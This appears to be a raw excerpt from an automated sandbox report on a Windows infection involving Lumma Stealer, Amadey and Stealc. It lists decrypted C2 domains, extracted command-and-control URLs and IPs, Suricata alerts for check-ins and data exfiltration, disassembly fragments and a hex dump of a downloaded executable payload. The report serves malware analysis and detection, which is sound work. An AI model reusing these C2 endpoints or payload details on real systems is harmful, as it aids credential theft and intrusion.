                          Source: 11.2.d0d9725343.exe.400000.1.unpackString decryptor: dwell-exclaim.biz
                          Source: 11.2.d0d9725343.exe.400000.1.unpackString decryptor: zinc-sneark.biz
                          Source: 11.2.d0d9725343.exe.400000.1.unpackString decryptor: se-blurry.biz
                          Source: 11.2.d0d9725343.exe.400000.1.unpackString decryptor: drive-connect.cyou
                          Source: 11.2.d0d9725343.exe.400000.1.unpackString decryptor: lid=%s&j=%s&ver=4.0
                          Source: 11.2.d0d9725343.exe.400000.1.unpackString decryptor: TeslaBrowser/5.5
                          Source: 11.2.d0d9725343.exe.400000.1.unpackString decryptor: - Screen Resoluton:
                          Source: 11.2.d0d9725343.exe.400000.1.unpackString decryptor: - Physical Installed Memory:
                          Source: 11.2.d0d9725343.exe.400000.1.unpackString decryptor: Workgroup: -
                          Source: 11.2.d0d9725343.exe.400000.1.unpackString decryptor: FATE99--test
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_00416B7E CryptUnprotectData,11_2_00416B7E
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_004035B0 CryptAcquireContextW,CryptCreateHash,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,12_2_004035B0
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_04B43817 CryptAcquireContextW,CryptCreateHash,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,12_2_04B43817
                          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                          Source: unknownHTTPS traffic detected: 172.67.139.78:443 -> 192.168.2.6:49867 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.139.78:443 -> 192.168.2.6:49873 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.139.78:443 -> 192.168.2.6:49879 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.139.78:443 -> 192.168.2.6:49884 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.139.78:443 -> 192.168.2.6:49891 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.139.78:443 -> 192.168.2.6:49899 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.139.78:443 -> 192.168.2.6:49905 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49921 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.139.78:443 -> 192.168.2.6:49924 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49930 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49936 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49943 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49951 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49958 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49960 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49967 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49973 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49979 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49992 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49994 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:50013 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50014 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50017 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:50033 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:50041 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:50065 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:50074 version: TLS 1.2
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 8_2_00240868 FindFirstFileExW,8_2_00240868
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 8_2_00240919 FindFirstFileExW,FindNextFileW,FindClose,FindClose,8_2_00240919
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 10_2_00240868 FindFirstFileExW,10_2_00240868
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 10_2_00240919 FindFirstFileExW,FindNextFileW,FindClose,FindClose,10_2_00240919
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_004176E7 FindFirstFileExW,12_2_004176E7
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_10007EA9 FindFirstFileExW,12_2_10007EA9
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_04B5794E FindFirstFileExW,12_2_04B5794E
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+05h]11_2_0040A960
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+79314A46h]11_2_00426170
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then push eax11_2_0040C36E
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h11_2_0043DBD0
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then mov edx, ecx11_2_00409CC0
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 29DF508Eh11_2_0043DCF0
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then mov byte ptr [edx], bl11_2_0040CE55
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+36A27D27h]11_2_0042C6D7
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then mov byte ptr [esi], al11_2_0042C6D7
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+07540F19h]11_2_0042C6D7
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+07540F19h]11_2_0042C6D7
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then mov word ptr [eax], dx11_2_00417E82
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 299A4ECDh11_2_0043E690
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-51BA460Ah]11_2_0042BFD3
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-51BA460Ah]11_2_0042BFDA
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]11_2_0042A060
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-0BF7BDDDh]11_2_00425F7D
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then mov edx, ecx11_2_0041D074
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then mov edx, ecx11_2_0041D087
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then mov byte ptr [esi], cl11_2_0042D085
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then mov byte ptr [esi], cl11_2_0042D085
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh]11_2_0041597D
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh]11_2_00416E97
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then mov edi, eax11_2_00416E97
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then mov ebx, eax11_2_00405910
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then mov ebp, eax11_2_00405910
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h11_2_00425920
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then mov word ptr [eax], cx11_2_004286F0
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh]11_2_00417190
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then mov ecx, eax11_2_00422270
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then mov byte ptr [edi+ebx], 00000000h11_2_0040C274
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then mov eax, dword ptr [00444284h]11_2_00425230
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]11_2_0043CAC0
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+1Ch]11_2_004292D0
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then mov edx, ebx11_2_004292D0
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]11_2_0042AAD0
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then mov byte ptr [eax], cl11_2_00415ADC
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then movzx ebx, bx11_2_0042536C
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+esi]11_2_00402B70
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then mov word ptr [ecx], dx11_2_00427307
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then movzx ebp, word ptr [ecx+ebx*2]11_2_00436B20
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]11_2_0043CBD6
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]11_2_00407470
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]11_2_00407470
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then jmp eax11_2_0042B475
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h11_2_00419C10
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]11_2_0043CCE0
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then mov byte ptr [ebx], al11_2_0042B4BB
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]11_2_0043CD60
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then movzx ebx, byte ptr [edx]11_2_004345F0
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+2Ch]11_2_00427653
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]11_2_0043CE00
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h11_2_0042A630
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-41h]11_2_004296D8
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then movzx edi, byte ptr [esi+ecx-000000BCh]11_2_00415EE0
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then mov word ptr [eax], cx11_2_00421EE0
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then cmp al, 2Eh11_2_004266E7
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then mov word ptr [eax], cx11_2_004286F0
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh]11_2_00416E97
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then mov edi, eax11_2_00416E97
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then cmp word ptr [ebp+edx+02h], 0000h11_2_0041CEA5
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then add ebx, 03h11_2_00428F5D
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-0BF7BDDDh]11_2_00425F7D
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then cmp dword ptr [ecx+edx*8], B430E561h11_2_00414F08
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then mov ecx, edx11_2_00414F08
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then mov word ptr [eax], cx11_2_00420717
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then mov word ptr [ecx], dx11_2_00420717
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 2298EE00h11_2_0043DFB0
                          Source: firefox.exeMemory has grown: Private usage: 1MB later: 190MB

                          Networking

                          barindex
                          Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.6:49848 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.6:49854
                          Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49868 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49892 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.6:49921 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49916 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2057921 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (atten-supporse .biz) : 192.168.2.6:55941 -> 1.1.1.1:53
                          Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.6:49930 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.6:49936 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49942 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.6:49943 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49944 -> 185.215.113.206:80
                          Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.6:49951 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.6:49958 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.6:49960 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49965 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.6:49967 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.6:49973 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.6:49979 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.6:49992 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.6:49994 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50004 -> 185.215.113.206:80
                          Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50008 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.6:50013 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.6:50033 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.6:50041 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.6:50050 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.6:50065 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.6:50074 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.6:50079 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49873 -> 172.67.139.78:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49873 -> 172.67.139.78:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49924 -> 172.67.139.78:443
                          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49921 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49879 -> 172.67.139.78:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49921 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49967 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49967 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49867 -> 172.67.139.78:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49867 -> 172.67.139.78:443
                          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49958 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49958 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49930 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49930 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49936 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49992 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:50074 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50074 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:50065 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50065 -> 104.21.48.1:443
                          Source: Malware configuration extractorURLs: http://185.215.113.206/c4becf79229cb002.php
                          Source: Malware configuration extractorURLs: drive-connect.cyou
                          Source: Malware configuration extractorURLs: se-blurry.biz
                          Source: Malware configuration extractorURLs: zinc-sneark.biz
                          Source: Malware configuration extractorURLs: dare-curbys.biz
                          Source: Malware configuration extractorURLs: formy-spill.biz
                          Source: Malware configuration extractorURLs: print-vexer.biz
                          Source: Malware configuration extractorURLs: covery-mover.biz
                          Source: Malware configuration extractorURLs: impend-differ.biz
                          Source: Malware configuration extractorURLs: dwell-exclaim.biz
                          Source: Malware configuration extractorIPs: 185.215.113.43
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 09 Dec 2024 20:09:09 GMTContent-Type: application/octet-streamContent-Length: 828416Last-Modified: Mon, 09 Dec 2024 19:37:50 GMTConnection: keep-aliveETag: "6757470e-ca400"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 08 00 8d fe 56 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 a0 02 00 00 e0 00 00 00 00 00 00 72 e5 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 0c 00 00 08 00 00 a9 ae 0c 00 03 00 40 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e0 3c 03 00 3c 00 00 00 00 a0 03 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 03 00 88 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 ff 02 00 18 00 00 00 88 c2 02 00 c0 00 00 00 00 00 00 00 00 00 00 00 94 3e 03 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 9e 02 00 00 10 00 00 00 a0 02 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 3c a3 00 00 00 b0 02 00 00 a4 00 00 00 a8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d4 27 00 00 00 60 03 00 00 18 00 00 00 4c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 54 4c 53 00 00 00 00 09 00 00 00 00 90 03 00 00 02 00 00 00 64 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 10 00 00 00 00 a0 03 00 00 02 00 00 00 66 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 88 1f 00 00 00 b0 03 00 00 20 00 00 00 68 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 62 73 73 00 00 00 00 00 8e 04 00 00 d0 03 00 00 8e 04 00 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 00 8e 04 00 00 60 08 00 00 8e 04 00 00 16 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
